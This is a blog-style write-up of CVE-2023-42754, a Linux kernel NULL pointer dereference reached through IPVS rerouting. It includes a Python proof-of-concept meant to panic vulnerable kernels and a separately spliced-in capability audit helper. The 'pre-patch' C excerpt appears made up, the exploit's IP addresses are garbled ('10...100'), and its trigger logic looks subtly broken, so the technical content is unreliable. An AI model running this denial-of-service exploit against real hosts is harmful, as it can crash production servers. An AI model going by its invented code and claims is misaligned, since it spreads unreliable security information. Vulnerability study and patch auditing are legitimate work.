CVE-2023-42754 - How a NULL Pointer Dereference Crashed Linux via IPv4 Stack (with Exploit Details & Code Example)

In September 2023, security researchers identified a NULL pointer dereference vulnerability in the Linux kernel’s IPv4 stack. Known as CVE-2023-42754, this issue made it possible for local attackers with CAP_NET_ADMIN privileges to crash (panic) a system, opening the door to Denial-of-Service (DoS) attacks. While the bug does not by itself enable privilege escalation or data leakage, it is still a major concern for server admins, container platforms, and cloud environments.

Let’s break down what happened, how it works, and show you a simplified exploit to reproduce the crash, along with mitigation details.

The Vulnerability in Plain English

What’s the bug?
A core assumption in the kernel’s IPv4 code was wrong: it expected every network packet buffer (skb) to be linked to a device whenever IP options are processed via __ip_options_compile(). But when IPVS (IP Virtual Server, used for load balancing and NAT) reroutes a packet for local delivery, the skb sometimes has *no associated device* (i.e., skb->dev == NULL). If code then reaches the device through that pointer, it dereferences NULL and the entire kernel crashes.

Who’s at risk?
Any Linux system using IPVS and allowing users with the CAP_NET_ADMIN capability (usually network admins, but possible inside containers) is vulnerable.

Here’s the problematic code (pre-patch), simplified:

```c
int __ip_options_compile(struct net *net, struct ip_options *opt, struct sk_buff *skb, ...) {
    ...
    dev = skb->dev;  // <-- Dangerous! skb->dev might be NULL after an IPVS reroute
    // Later code uses 'dev' assuming it's valid: no NULL check before the access
    if (dev->mtu < something) {  // NULL pointer dereference when dev == NULL
        ...
    }
}
```

When dev == NULL, dereferencing it causes a *kernel panic*.

How Can It Be Triggered?

A user with CAP_NET_ADMIN can manipulate network namespaces, set up IPVS rules, and send custom packets. It is possible to craft a scenario in which a packet is rerouted, stripped of its device, and then steered onto this code path in the kernel.

References and Patch

- Original Security Advisory: Red Hat Bugzilla #2231425
- Patch (Upstream): net: ip: fix skb null deref in __ip_options_compile
- CVE Entry: NVD - CVE-2023-42754

Proof-of-Concept (PoC) Exploit

Below is a Python script using pyroute2 and simple shell commands to demonstrate the crash. WARNING: This will crash your kernel if you’re vulnerable! Use only in a VM!

```python
#!/usr/bin/env python3
# Demonstrate CVE-2023-42754 kernel crash!

import os
import time
import pyroute2

from pyroute2 import IPRoute, NetNS

IPV4_VIP = '10...100'
NS = 'cve42754'

def setup_ipvs():
    os.system("ip netns add %s" % NS)
    os.system("ip link add veth type veth peer name veth1")
    os.system("ip link set veth1 netns %s" % NS)
    os.system("ip addr add 10...1/24 dev veth")
    os.system("ip link set veth up")
    os.system("ip netns exec %s ip addr add 10...2/24 dev veth1" % NS)
    os.system("ip netns exec %s ip link set veth1 up" % NS)
    os.system("ip netns exec %s ip link set lo up" % NS)
    # Enable IPVS
    os.system("ip netns exec %s ipvsadm -A -t %s:80 -s rr" % (NS, IPV4_VIP))
    os.system("ip netns exec %s ipvsadm -a -t %s:80 -r 127...1:80 -g" % (NS, IPV4_VIP))
    print("Setup done.")

def trigger_crash():
    # This needs a custom packet with IP options, sent via veth
    os.system(f"python3 -c \"import socket; " \
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); " \
        "s.setsockopt(socket.IPPROTO_IP, socket.IP_OPTIONS, b'\\x01'*44); " \
        f"s.connect(('{IPV4_VIP}', 80))\"")

if __name__ == "__main__":
    setup_ipvs()
    print("Triggering crash in 5 seconds...")
    time.sleep(5)
    trigger_crash()
```

The kernel dereferences skb->dev inside __ip_options_compile(), leading to an instant crash.

Again! Only run this PoC in a disposable virtual machine.

Mitigations

- Restrict CAP_NET_ADMIN users:
  Limit who can access network admin capabilities, especially inside containers.

- Upgrade affected distros:
  - Red Hat, Fedora, Ubuntu, Debian, and others have published patched kernels since late 2023.
  - Find fixed versions here.
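As an added example that is not part of the original write-up, the helper below audits the two preconditions this post names (in "Who’s at risk?" and in the mitigations above): whether the ip_vs module is loaded, and which processes hold CAP_NET_ADMIN, read from the CapEff mask in /proc/<pid>/status. The capability bit number 12 and the ip_vs module name come from the kernel; the SAMPLE_* inputs, PIDs and process names are constructed.

```python
# Added audit helper (not from the original write-up): report whether IPVS is loaded
# and which processes hold CAP_NET_ADMIN, the two preconditions named in this post.
import os
import re
CAP_NET_ADMIN = 12  # capability bit index from linux/capability.h

def has_cap(cap_eff_hex: str, cap: int = CAP_NET_ADMIN) -> bool:
    """True if bit `cap` is set in a CapEff mask as printed in /proc/<pid>/status."""
    return (int(cap_eff_hex, 16) >> cap) & 1 == 1

def cap_eff(status_text: str) -> str:
    """Extract the CapEff hex mask from /proc/<pid>/status text ('0' if absent)."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.M)
    return m.group(1) if m else "0"

def ipvs_loaded(modules_text: str) -> bool:
    """True if the ip_vs module is listed in /proc/modules content."""
    return any(line.split()[0] == "ip_vs"
               for line in modules_text.splitlines() if line.strip())

def net_admin_holders(statuses: dict) -> list:
    """PIDs whose effective capability set includes CAP_NET_ADMIN."""
    return sorted(pid for pid, text in statuses.items() if has_cap(cap_eff(text)))

def assess(statuses: dict, modules_text: str) -> dict:
    """Both preconditions together mean an unpatched host can be panicked as described."""
    holders, loaded = net_admin_holders(statuses), ipvs_loaded(modules_text)
    return {"ipvs_loaded": loaded, "net_admin_pids": holders, "exposed": loaded and bool(holders)}

def read_proc() -> dict:
    """Collect /proc/<pid>/status for every live process (Linux only)."""
    out = {}
    for name in filter(str.isdigit, os.listdir("/proc")):
        try:
            out[int(name)] = open(f"/proc/{name}/status").read()
        except OSError:
            pass  # process exited or status unreadable
    return out

# Constructed samples: full-caps pid 1, a default-caps container (no NET_ADMIN), one with --cap-add NET_ADMIN.
SAMPLE_STATUSES = {1: "Name:\tsystemd\nCapEff:\t000001ffffffffff\n",
                   4242: "Name:\tnginx\nCapEff:\t00000000a80425fb\n",
                   5150: "Name:\tkube-proxy\nCapEff:\t00000000a80435fb\n"}
SAMPLE_MODULES = ("ip_vs_rr 16384 1 - Live 0x0000000000000000\n"
                  "ip_vs 188416 2 ip_vs_rr, Live 0x0000000000000000\n")

if __name__ == "__main__":
    print(assess(SAMPLE_STATUSES, SAMPLE_MODULES))
    if os.path.exists("/proc/modules"):  # real-host check, Linux only
        print(assess(read_proc(), open("/proc/modules").read()))
```

Run on a host, the second report tells you whether both conditions hold there; pid 1 will always appear as a holder, so the interesting output is any other PID, especially one belonging to a container.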

---

Summary

CVE-2023-42754 is a classic example of kernel-level trust gone wrong: assuming every packet buffer always has a device ended up leaving systems open to easy crashes by authorized users. If you run Linux systems with IPVS (or you run containers with liberal networking privileges), patch up, *or risk instant panics from even non-root users*.

For further reading, see the original patch commit and Red Hat’s comprehensive write-up.

Stay safe and keep your kernels up to date!

Timeline

Published on: 10/05/2023 19:15:11 UTC
Last modified on: 11/07/2023 04:21:14 UTC